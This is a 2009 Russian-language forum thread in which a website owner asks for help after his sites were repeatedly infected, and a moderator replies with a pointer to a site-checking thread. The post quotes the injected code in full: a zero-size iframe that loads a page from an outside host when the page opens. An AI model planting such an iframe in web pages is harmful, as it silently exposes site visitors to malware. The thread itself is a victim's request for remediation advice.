Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   Не могу вылечиться от HTML:Illiframe-D [Trj и что теперь делать? (http://forum.oszone.net/showthread.php?t=155730)

loftiplamar 04-11-2009 11:47 1261259
Не могу вылечиться от HTML:Illiframe-D [Trj и что теперь делать?
 
Ситуация следующая: несколько дней назад вирусом были заражены все мои сайты (на нескольких хостингах). Код вируса записывался к конец файлов (в основном только файлов с названием index.*). Выглядел примерно следующим образом:

<iframe frameborder="0" onload="if (!this.src){ this.src='http://iq-mozgi.ru:8080/index.php'; this.height='0'; this.width='0';}" >vomfhwifyuxyvbppdqqmcsxjdloumov</iframe>

Аваст определяет HTML:Illiframe-D [Trj]. Сначала я почистил все файлы с такой строкой (и пододными строками, их было несколько вариантов) и все вроде как наладилось. На следующий день у меня снова все сайты были заражены. Тут я понял, что зря я хранил пароли введенными в total commander. Чтобы избавиться от вируса, я сначала поменял все пароли, удалил фтп соединения из тотала, снова почистил хост. Все опять наладилось, но уже на следующий день снова все сайты заражены. В чем же дело - я же уже не сохранял пароли? А может вирус прописался в пределах сайта, чтобы самовосстанавливаться?

ЧТо касается безопасности, то перед первым заражением у меня стояла бесплатная версия Avira (которая регулярно обновляется), затем в дополнение к Avira я поставил Avast, проверил им комп, он вроде как убил вирусы, но как видимо - не все. Система WinXP SP3 (обновления отключены)

Еще один момент - когда запускаю вебмани (и еще в некоторых случаях) сейчас (после установки аваста), Avira ругается на обнаружение вируса TR/Crypt.XPACK.Gen, но показывает, что он находится в файле C:\WINDOWS\Temp\_avast4_\unp174722536.tmp.

Итак, на данный момент я принял решение, что нужно переставить винду (перед этим отформатировав все диски), затем поставить нормальный антивирус и файервол и в дальнейшем не сохранять фтп пароли введенными. Что касается сайтов - то посносить их и восстановить записи из БД (у меня все в основном на вордпрессе).

От вас жду:
1. Советов по поводу правильности моего решения (и эффективности на будущее)
2. Советов, какие антивирь и файервол лучше установить, и вообще как граммотно восстановить безопасность в данном случае?

p.s. и еще меня очень настораживает момент, что после смены паролей (при том что они не сохранялись в фтп клиенте) - вирус их все-таки украл (конечно, если на сайтах просто не остался самовосстанавливающийся вирусный код)

Drongo 04-11-2009 16:00 1261459
loftiplamar, Попробуйте с проверкой сайта на вирусы обратиться сюда - Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте тут


Время: 21:40.

Время: 21:40.
© OSzone.net 2001-